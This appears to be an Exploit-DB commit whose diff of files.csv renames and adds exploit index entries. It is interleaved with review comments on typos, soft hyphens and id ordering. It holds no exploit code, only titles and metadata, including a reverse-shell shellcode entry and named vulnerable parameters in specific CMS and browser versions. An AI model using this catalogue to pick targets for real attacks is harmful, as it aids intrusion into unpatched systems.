DB: 2016-12-08

12 new exploits

vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit
vsftpd 2.0.5 - 'CWD' Authenticated Remote Memory Consumption

XChat - Heap Overflow Denial of Service
XChat 2.8.9 - Heap Overflow Denial of Service

Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (1)
Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (1)

glibc - getaddrinfo Stack Based Buffer Overflow (1)
glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC)
Microsoft Edge - JSON.parse Info Leak
Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index
Microsoft Edge - CMarkup::Ensure­Delete­CFState Use-After-Free (MS15-125)
Microsoft Internet Explorer 9 - CDoc::Execute­Script­Uri Use-After-Free (MS13-009)
Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068)
Windows 10 x86/x64 WLAN AutoConfig - Denial of Service (POC)

Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation (1)
Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation

Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation (2)
Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation

Microsoft PowerShell - XML External Entity Injection

XChat 2.8.7b - (URI Handler) Remote Code Execution (Internet Explorer 6/7'
XChat 2.8.7b - 'URI Handler' Remote Code Execution (Internet Explorer 6/7)

Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap

glibc - getaddrinfo Stack Based Buffer Overflow (2)
glibc - 'getaddrinfo' Stack Based Buffer Overflow

Microsoft Internet Explorer jscript9 - Java­Script­Stack­Walker Memory Corruption (MS15-056)

Linux/x86 - Netcat (-e option disabled) Reverse Shell Shellcode (180 bytes)

Gravity Board X 1.1 - (csscontent) Remote Code Execution
Gravity Board X 1.1 - 'csscontent' Parameter Remote Code Execution

Mambo Component 'com_extcalendar' 2.0 - Remote File Inclusion
Mambo Component ExtCalendar 2.0 - Remote File Inclusion

Mambo Component com_babackup 1.1 - File Inclusion
Mambo Component bigAPE-Backup 1.1 - File Inclusion

E-Smart Cart 1.0 - 'Product_ID' SQL Injection
E-Smart Cart 1.0 - 'Product_ID' Parameter SQL Injection

Joomla! / Mambo Component 'com_swmenupro' 4.0 - Remote File Inclusion
Joomla! / Mambo Component SWmenu 4.0 - Remote File Inclusion

Joomla! / Mambo Component 'com_thopper' 1.1 - Remote File Inclusion
Joomla! / Mambo Component Taskhopper 1.1 - Remote File Inclusion

Joomla! / Mambo Component 'com_articles' 1.1 - Remote File Inclusion
Joomla! / Mambo Component New Article 1.1 - Remote File Inclusion

Cartweaver - 'Details.cfm ProdID' SQL Injection
Cartweaver 2.16.11 - 'ProdID' Parameter SQL Injection

Joomla! / Mambo Component 'com_rsgallery' 2.0b5 - 'catid' SQL Injection
Joomla! / Mambo Component rsgallery 2.0b5 - 'catid' Parameter SQL Injection

xeCMS 1.x - (view.php list) Remote File Disclosure
xeCMS 1.x - 'view.php' Remote File Disclosure

Mambo Component 'com_portfolio' 1.0 - 'categoryId' SQL Injection
Mambo Component Portfolio Manager 1.0 - 'categoryId' Parameter SQL Injection

Easy-Clanpage 2.2 - 'id' SQL Injection
Easy-Clanpage 2.2 - 'id' Parameter SQL Injection
JAMM CMS - 'id' Blind SQL Injection
Gravity Board X 2.0 Beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
JAMM CMS - 'id' Parameter Blind SQL Injection
Gravity Board X 2.0 Beta - SQL Injection / Cross-Site Scripting
GLLCTS2 <= 4.2.4 - (login.php detail) SQL Injection
Butterfly ORGanizer 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
GLLCTS2 <= 4.2.4 - 'detail' Parameter SQL Injection
Butterfly ORGanizer 2.0.0 - SQL Injection / Cross-Site Scripting

Mambo Component 'com_galleries' 1.0 - 'aid' Parameter SQL Injection
Mambo Component Galleries 1.0 - 'aid' Parameter SQL Injection
Easy-Clanpage 3.0b1 - (section) Local File Inclusion
WebChamado 1.1 - (tsk_id) SQL Injection
Pre News Manager 1.0 - (index.php id) SQL Injection
Pre Ads Portal 2.0 - SQL Injection
Easy-Clanpage 3.0b1 - 'section' Parameter Local File Inclusion
WebChamado 1.1 - 'tsk_id' Parameter SQL Injection
Pre News Manager 1.0 - 'id' Parameter SQL Injection
Pre ADS Portal 2.0 - SQL Injection

GLLCTS2 - 'listing.php sort' Blind SQL Injection
GLLCTS2 - 'sort' Parameter Blind SQL Injection

Contenido 4.8.4 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Contenido 4.8.4 - Remote File Inclusion / Cross-Site Scripting
PHPMyCart - 'shop.php cat' SQL Injection
SHOUTcast Admin Panel 2.0 - (page) Local File Inclusion
Cartweaver 3 - (prodId) Blind SQL Injection
DIY - (index_topic did) Blind SQL Injection
PHPMyCart 1.3 - 'cat' Parameter SQL Injection
SHOUTcast Admin Panel 2.0 - 'page' Parameter Local File Inclusion
Cartweaver 3 - 'prodId' Parameter Blind SQL Injection
DIY - 'did' Parameter Blind SQL Injection
ezcms 1.2 - (Blind SQL Injection / Authentication Bypass) Multiple Vulnerabilities
PHPEasyNews 1.13 RC2 - (POST) SQL Injection
ezcms 1.2 - Blind SQL Injection / Authentication Bypass
PHPEasyNews 1.13 RC2 - 'POST' Parameter SQL Injection

Devalcms 1.4a - (currentfile) Local File Inclusion
Devalcms 1.4a - 'currentfile' Parameter Local File Inclusion

IPTBB 0.5.6 - (index.php act) Local File Inclusion
IPTBB 0.5.6 - 'act' Parameter Local File Inclusion

Mambo Component 'articles' - 'artid' Parameter Blind SQL Injection
Mambo Component Articles - 'artid' Parameter Blind SQL Injection

Mambo Component 'com_n-gallery' - Multiple SQL Injections
Mambo Component N-Gallery - Multiple SQL Injections

devalcms 1.4a - Cross-Site Scripting / Remote Code Execution
Devalcms 1.4a - Cross-Site Scripting / Remote Code Execution

PHP JOBWEBSITE PRO - (Authentication Bypass) SQL Injection
PHP JOBWEBSITE PRO - Authentication Bypass

Pre ADS Portal 2.0 - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities
Pre ADS Portal 2.0 - Authentication Bypass / Cross-Site Scripting

Mambo Component 'com_n-forms' - 'form_id' Parameter Blind SQL Injection
Mambo Component n-form - 'form_id' Parameter Blind SQL Injection

Pre Job Board - (Authentication Bypass) SQL Injection
Pre Job Board - Authentication Bypass

Butterfly ORGanizer 2.0.1 - (view.php id) SQL Injection
Butterfly ORGanizer 2.0.1 - 'id' Parameter SQL Injection

facil-cms 0.1rc2 - Multiple Vulnerabilities
Facil-CMS 0.1RC2 - Multiple Vulnerabilities

Family Connections CMS 1.9 - (member) SQL Injection
Family Connections CMS 1.9 - SQL Injection

Mambo Component 'com_hestar' - SQL Injection
Mambo Component Hestar - SQL Injection

Joomla! / Mambo Component 'com_tupinambis' - SQL Injection
Joomla! / Mambo Component Tupinambis - SQL Injection

Joomla! / Mambo Component 'com_ezine' 2.1 - Remote File Inclusion
Joomla! / Mambo Component D4J eZine 2.1 - Remote File Inclusion

Mambo Component 'com_materialsuche' 1.0 - SQL Injection
Mambo Component Material Suche 1.0 - SQL Injection

Pre ADS Portal - 'cid' SQL Injection
Pre ADS Portal - 'cid' Parameter SQL Injection

Pre News Manager - (nid) SQL Injection
Pre News Manager - 'nid' Parameter SQL Injection

Mambo Component 'com_akogallery' - SQL Injection
Mambo Component AkoGallery - SQL Injection

Mambo Component 'com_mambads' - SQL Injection
Mambo Component MambAds - SQL Injection

Facil-CMS - (Local File Inclusion / Remote File Inclusion)
Facil-CMS 0.1RC2 - Local / Remote File Inclusion

AskMe Pro 2.1 - (que_id) SQL Injection
Alstrasoft AskMe Pro 2.1 - 'que_id' Parameter SQL Injection

Pre Job Board Pro - SQL Injection Authentication Bypass
Pre Job Board Pro - Authentication Bypass

DiY-CMS 1.0 - Multiple Remote File Inclusion
DIY-CMS 1.0 - Multiple Remote File Inclusion

Alstrasoft AskMe Pro 2.1 - (forum_answer.php?que_id) SQL Injection

Alstrasoft AskMe Pro 2.1 - (profile.php?id) SQL Injection
Alstrasoft AskMe Pro 2.1 - 'profile.php' SQL Injection

Pre Ads Portal - SQL Bypass
Pre ADS Portal - Authentication Bypass

Family Connections CMS 2.3.2 - (POST) Persistent Cross-Site Scripting / XML Injection
Family Connections CMS 2.3.2 - Persistent Cross-Site Scripting / XML Injection

Family Connections CMS 2.5.0 / 2.7.1 - (less.php) Remote Command Execution
Family Connections CMS 2.5.0 / 2.7.1 - 'less.php' Remote Command Execution

Family Connections CMS - 'less.php' Remote Command Execution (Metasploit)
Family Connections CMS 2.7.1 - 'less.php' Remote Command Execution (Metasploit)

Gravity Board X 1.1 - DeleteThread.php Cross-Site Scripting

Clever Copy 3.0 - Connect.INC Information Disclosure
Clever Copy 3.0 - 'Connect.INC' Information Disclosure

Cartweaver 2.16.11 - Results.cfm category Parameter SQL Injection
Cartweaver 2.16.11 - Details.cfm ProdID Parameter SQL Injection
Cartweaver 2.16.11 - 'Results.cfm' SQL Injection
Mambo Component 'lmtg_myhomepage' 1.2 - Multiple Remote File Inclusion
Mambo Component 'com_rssxt' 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion
Mambo Component LMTG Myhomepage 1.2 - Multiple Remote File Inclusion
Mambo Component Rssxt 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion

Mambo Component 'com_admin-copy_module' - 'MosConfig_absolute_path' Parameter Remote File Inclusion
Mambo Component Display MOSBot Manager - 'MosConfig_absolute_path' Parameter Remote File Inclusion

Joomla! / Mambo Component 'com_comprofiler' 1.0 - 'class.php' Remote File Inclusion
Joomla! / Mambo Component Comprofiler 1.0 - 'class.php' Remote File Inclusion

Joomla! / Mambo Component 'com_sg' - 'pid' Parameter SQL Injection
Joomla! / Mambo Component com_sg - 'pid' Parameter SQL Injection

Joomla! / Mambo Component 'com_salesrep' - 'rid' Parameter SQL Injection
Joomla! / Mambo Component com_salesrep - 'rid' Parameter SQL Injection
Joomla! / Mambo Component 'com_filebase' - 'filecatid' Parameter SQL Injection
Joomla! / Mambo Component 'com_scheduling' - 'id' Parameter SQL Injection
Joomla! / Mambo Component Filebase - 'filecatid' Parameter SQL Injection
Joomla! / Mambo Component com_scheduling - 'id' Parameter SQL Injection

Joomla! / Mambo Component 'com_profile' - 'oid' Parameter SQL Injection
Joomla! / Mambo Component com_profile - 'oid' Parameter SQL Injection

Joomla! / Mambo Component 'com_datsogallery' 1.3.1 - 'id' Parameter SQL Injection
Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' Parameter SQL Injection
PHP JOBWEBSITE PRO - siteadmin/forgot.php adname Parameter SQL Injection
PHP JOBWEBSITE PRO - siteadmin/forgot.php Multiple Parameter Cross-Site Scripting
PHP JOBWEBSITE PRO - 'adname' Parameter SQL Injection
PHP JOBWEBSITE PRO - 'forgot.php' Cross-Site Scripting

Joomla! / Mambo Component 'com_gigcal' 1.0 - 'banddetails.php' SQL Injection
Joomla! / Mambo Component gigCalendar 1.0 - 'banddetails.php' SQL Injection

Conkurent PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass
PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass

Mambo Component 'com_docman' 1.3.0 - Multiple SQL Injection
Mambo Component Docman 1.3.0 - Multiple SQL Injection

Mambo Component 'com_n-skyrslur' - Cross-Site Scripting
Mambo Component N-Skyrslur - Cross-Site Scripting

Mambo Component 'com_n-gallery' - SQL Injection
Mambo Component N-Gallery - SQL Injection

Mambo Component 'com_n-press' - SQL Injection
Mambo Component N-Press - SQL Injection
Mambo Component 'com_n-frettir' - SQL Injection
Mambo Component 'com_n-myndir' - SQL Injection
Mambo Component N-Frettir - SQL Injection
Mambo Component N-Myndir - SQL Injection

AbanteCart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities
Edge SkateShop - Authentication bypass

AbanteCart 1.2.7 - Cross-Site Scripting
Offensive Security 2016-12-08 05:01:21 +00:00
parent 855e59f932
commit fb1dd3709f
19 changed files with 1351 additions and 151 deletions

files.csv (192 changed lines)

@ -739,7 +739,7 @@ id,file,description,date,author,platform,type,port
5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0
5727,platforms/windows/dos/5727.pl,"Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0
5749,platforms/multiple/dos/5749.pl,"Asterisk 1.2.x - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0
5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit",2008-06-14,"Praveen Darshanam",linux,dos,0
5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - 'CWD' Authenticated Remote Memory Consumption",2008-06-14,"Praveen Darshanam",linux,dos,0
5817,platforms/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow (PoC)",2008-06-14,t0pP8uZz,windows,dos,0
5843,platforms/windows/dos/5843.html,"P2P Foxy - Out of Memory Denial of Service",2008-06-17,Styxosaurus,windows,dos,0
5851,platforms/windows/dos/5851.txt,"Visual Basic Enterprise Edition SP6 - 'vb6skit.dll' Buffer Overflow (PoC)",2008-06-18,shinnai,windows,dos,0
@ -2074,7 +2074,7 @@ id,file,description,date,author,platform,type,port
18116,platforms/multiple/dos/18116.html,"Mozilla Firefox 8.0 - Null Pointer Dereference (PoC)",2011-11-14,0in,multiple,dos,0
18124,platforms/windows/dos/18124.py,"Thunder Kankan Player 4.8.3.840 - Stack Overflow / Denial of Service",2011-11-18,hellok,windows,dos,0
18140,platforms/windows/dos/18140.c,"Microsoft Winows 7 - Keyboard Layout Blue Screen of Death (MS10-073)",2011-11-21,instruder,windows,dos,0
18159,platforms/linux/dos/18159.py,"XChat - Heap Overflow Denial of Service",2011-11-25,"Jane Doe",linux,dos,0
18159,platforms/linux/dos/18159.py,"XChat 2.8.9 - Heap Overflow Denial of Service",2011-11-25,"Jane Doe",linux,dos,0
18165,platforms/windows/dos/18165.txt,"siemens automation license manager 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0
18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0
18173,platforms/windows/dos/18173.pl,"Bugbear FlatOut 2005 - Malformed .bed file Buffer Overflow",2011-11-30,Silent_Dream,windows,dos,0
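Review bot: the context line for 18140, two rows above the changed 18159 entry, still reads "Microsoft Winows 7 - Keyboard Layout Blue Screen of Death (MS10-073)"; since this commit is a title clean-up pass over exactly this region, fix the "Winows" typo in the same change rather than leaving it for another round.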
@ -4980,14 +4980,14 @@ id,file,description,date,author,platform,type,port
39425,platforms/android/dos/39425.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption (MdConvertLine)",2016-02-08,"Google Security Research",android,dos,0
39426,platforms/multiple/dos/39426.txt,"Adobe Flash - Processing AVC Causes Stack Corruption",2016-02-08,"Google Security Research",multiple,dos,0
39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - '.mp3' Crash (PoC)",2016-02-09,"Shantanu Khandelwal",windows,dos,0
39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0
39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0
39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0
39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0
39445,platforms/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0
39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - SEH Crash (PoC)",2016-02-15,INSECT.B,windows,dos,0
39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0
39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack Based Buffer Overflow (1)",2016-02-16,"Google Security Research",linux,dos,0
39454,platforms/linux/dos/39454.txt,"glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC)",2016-02-16,"Google Security Research",linux,dos,0
39460,platforms/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",multiple,dos,0
39461,platforms/multiple/dos/39461.txt,"Adobe Flash - textfield Constructor Type Confusion",2016-02-17,"Google Security Research",multiple,dos,0
39462,platforms/multiple/dos/39462.txt,"Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer",2016-02-17,"Google Security Research",multiple,dos,0
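Review bot: the "&" to "/" change is applied only to 39429, while its siblings in the same hunk, 39430 ("Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (2)") and 39431 ("... - '.iff' File Parsing Memory Corruption"), keep the ampersand, so the three related titles now disagree; apply the same separator to all three. Also, renaming 39454 from "(1)" to "(PoC)" breaks the numbered pairing with the remote glibc entry (40339, renamed in a later hunk), which is fine as the new convention, but grep for any remaining "getaddrinfo ... (2)" title so no orphaned suffix is left behind.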
@ -5288,6 +5288,12 @@ id,file,description,date,author,platform,type,port
40844,platforms/windows/dos/40844.html,"Microsoft Internet Explorer 10 - MSHTML 'CEdit­Adorner::Detach' Use-After-Free (MS13-047)",2016-11-28,Skylined,windows,dos,0
40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8/9/10/11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0
40866,platforms/linux/dos/40866.py,"NetCat 0.7.1 - Denial of Service",2016-12-05,n30m1nd,linux,dos,0
40875,platforms/windows/dos/40875.html,"Microsoft Edge - JSON.parse Info Leak",2016-12-06,"Google Security Research",windows,dos,0
40876,platforms/android/dos/40876.txt,"Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index",2016-12-06,"Google Security Research",android,dos,0
40878,platforms/windows/dos/40878.txt,"Microsoft Edge - CMarkup::Ensure­Delete­CFState Use-After-Free (MS15-125)",2016-12-06,Skylined,windows,dos,0
40879,platforms/windows/dos/40879.html,"Microsoft Internet Explorer 9 - CDoc::Execute­Script­Uri Use-After-Free (MS13-009)",2016-12-06,Skylined,windows,dos,0
40880,platforms/windows/dos/40880.txt,"Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068)",2016-12-06,Skylined,windows,dos,0
40883,platforms/windows/dos/40883.py,"Windows 10 x86/x64 WLAN AutoConfig - Denial of Service (POC)",2016-12-06,"Jeremy Brown",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
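Review bot: the class names in the new 40878, 40879 and 40880 titles are split by zero-width soft-hyphen characters (visible here as the breaks in "CMarkup::Ensure­Delete­CFState", "CDoc::Execute­Script­Uri" and "CBase­Scriptable::Private­Query­Interface"); they render invisibly but will make searching, grepping and de-duplicating against "EnsureDeleteCFState" fail, so strip them before committing. Separately, 40883 uses "(POC)" where the rest of this file writes "(PoC)".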
@ -6578,7 +6584,7 @@ id,file,description,date,author,platform,type,port
15692,platforms/windows/local/15692.py,"Video Charge Studio 2.9.5.643 - '.vsc' Buffer Overflow (SEH)",2010-12-06,"xsploited security",windows,local,0
15693,platforms/windows/local/15693.html,"Viscom VideoEdit Gold ActiveX 8.0 - Remote Code Execution",2010-12-06,Rew,windows,local,0
15696,platforms/windows/local/15696.txt,"Alice 2.2 - Arbitrary Code Execution",2010-12-06,Rew,windows,local,0
15704,platforms/linux/local/15704.c,"Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation (1)",2010-12-07,"Dan Rosenberg",linux,local,0
15704,platforms/linux/local/15704.c,"Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
15706,platforms/windows/local/15706.txt,"Winamp 5.6 - Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0
15745,platforms/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) - Privilege Escalation",2010-12-15,"Kryptos Logic",linux,local,0
15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 - '.m3u' Buffer Overflow",2010-12-11,zota,windows,local,0
@ -6792,7 +6798,7 @@ id,file,description,date,author,platform,type,port
17745,platforms/windows/local/17745.pl,"DVD X Player 5.5 Professional - '.plf' Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local,0
17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit (ASLR + DEP Bypass)",2011-08-30,sickness,windows,local,0
17770,platforms/windows/local/17770.rb,"DVD X Player 5.5 - '.plf' Playlist Buffer Overflow (Metasploit)",2011-09-01,Metasploit,windows,local,0
17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation (2)",2011-09-05,"Jon Oberheide",linux,local,0
17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation",2011-09-05,"Jon Oberheide",linux,local,0
17777,platforms/windows/local/17777.rb,"Apple QuickTime - PICT PnSize Buffer Overflow (Metasploit)",2011-09-03,Metasploit,windows,local,0
17780,platforms/windows/local/17780.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (1)",2011-09-05,blake,windows,local,0
17783,platforms/windows/local/17783.pl,"ZipX 1.71 - '.ZIP' File Buffer Overflow",2011-09-05,"C4SS!0 G0M3S",windows,local,0
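Review bot: dropping the "(2)" from 17787 here, together with the "(1)" dropped from 15704 in the previous hunk, leaves the Half-Nelson and Full-Nelson titles unnumbered; that is correct only if no other entry still carries the matching "(1)"/"(2)" suffix, so grep for "Nelson" before merging. Also visible in the context, though not introduced by this change: 17787 sits before 17777 and 17780, so the id order in this block is already broken.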
@ -8677,6 +8683,7 @@ id,file,description,date,author,platform,type,port
40863,platforms/windows/local/40863.txt,"Microsoft Event Viewer 1.0 - XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
40864,platforms/windows/local/40864.txt,"Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Local Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0
40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -9649,7 +9656,7 @@ id,file,description,date,author,platform,type,port
5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin - (BiAnno.ocx) Buffer Overflow (2)",2008-06-10,shinnai,windows,remote,0
5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC Validation error Remote Authentication Bypass",2008-06-12,"Maurizio Agazzini",multiple,remote,161
5793,platforms/windows/remote/5793.html,"muvee autoProducer 6.1 - 'TextOut.dll' ActiveX Remote Buffer Overflow",2008-06-12,Nine:Situations:Group,windows,remote,0
5795,platforms/windows/remote/5795.html,"XChat 2.8.7b - (URI Handler) Remote Code Execution (Internet Explorer 6/7'",2008-06-13,securfrog,windows,remote,0
5795,platforms/windows/remote/5795.html,"XChat 2.8.7b - 'URI Handler' Remote Code Execution (Internet Explorer 6/7)",2008-06-13,securfrog,windows,remote,0
5827,platforms/windows/remote/5827.cpp,"Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow",2008-06-15,Heretic2,windows,remote,4000
5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G (Firmware 1.00.9) - Security Bypass Vulnerabilities (2)",2008-06-24,meathive,hardware,remote,0
6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow",2008-07-04,"Karol Wiesek",windows,remote,0
@ -13292,6 +13299,7 @@ id,file,description,date,author,platform,type,port
26075,platforms/hardware/remote/26075.txt,"MobileIron Virtual Smartphone Platform - Privilege Escalation",2013-06-10,prdelka,hardware,remote,0
26299,platforms/windows/remote/26299.c,"MultiTheftAuto 0.5 - Multiple Vulnerabilities",2005-09-26,"Luigi Auriemma",windows,remote,0
26101,platforms/linux/remote/26101.txt,"EMC Navisphere Manager 6.x - Directory Traversal / Information Disclosure Vulnerabilities",2005-08-05,anonymous,linux,remote,0
40874,platforms/android/remote/40874.txt,"Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap",2016-12-06,"Google Security Research",android,remote,0
26123,platforms/multiple/remote/26123.rb,"Java - Web Start Double Quote Injection Remote Code Execution (Metasploit)",2013-06-11,Rh0,multiple,remote,0
26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box - ConnectToSynactic Stack Buffer Overflow (Metasploit)",2013-06-11,Metasploit,windows,remote,0
26135,platforms/multiple/remote/26135.rb,"Java Applet - Driver Manager Privileged toString() Remote Code Execution (Metasploit)",2013-06-11,Metasploit,multiple,remote,0
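Review bot: the new 40874 is inserted between 26101 and 26123, in the middle of a 2005/2013-era block, instead of at the end of the remote section next to the other 2016-12 additions (40867 to 40869 in the following hunk); move it there so the ids in this block stay roughly sorted and this batch of new entries is easy to find in one place.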
@ -14353,7 +14361,7 @@ id,file,description,date,author,platform,type,port
34461,platforms/multiple/remote/34461.py,"NRPE 2.15 - Remote Code Execution",2014-08-29,"Claudio Viviani",multiple,remote,0
34462,platforms/windows/remote/34462.txt,"Microsoft Windows Kerberos - 'Pass The Ticket' Replay Security Bypass",2010-08-13,"Emmanuel Bouillon",windows,remote,0
34478,platforms/windows/remote/34478.html,"Microsoft Internet Explorer 8 - 'toStaticHTML()' HTML Sanitization Bypass",2010-08-16,"Mario Heiderich",windows,remote,0
40339,platforms/linux/remote/40339.py,"glibc - getaddrinfo Stack Based Buffer Overflow (2)",2016-09-06,SpeeDr00t,linux,remote,0
40339,platforms/linux/remote/40339.py,"glibc - 'getaddrinfo' Stack Based Buffer Overflow",2016-09-06,SpeeDr00t,linux,remote,0
34500,platforms/multiple/remote/34500.html,"Flock Browser 3.0.0 - Malformed Bookmark HTML Injection",2010-08-19,Lostmon,multiple,remote,0
34507,platforms/linux/remote/34507.txt,"Nagios XI - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",linux,remote,0
34517,platforms/windows/remote/34517.rb,"Wing FTP Server - Authenticated Command Execution (Metasploit)",2014-09-01,Metasploit,windows,remote,5466
@ -15129,6 +15137,7 @@ id,file,description,date,author,platform,type,port
40867,platforms/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",hardware,remote,0
40868,platforms/windows/remote/40868.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow (SEH)",2016-12-05,vportal,windows,remote,0
40869,platforms/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow",2016-12-05,vportal,windows,remote,0
40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer jscript9 - Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
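Review bot: the 40881 title "Microsoft Internet Explorer jscript9 - Java­Script­Stack­Walker Memory Corruption (MS15-056)" contains zero-width soft hyphens inside "JavaScriptStackWalker" (the word breaks visible above), which will defeat a plain-text search for the class name; remove them before this entry lands. The entry itself is otherwise in the right place at the end of the remote block.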
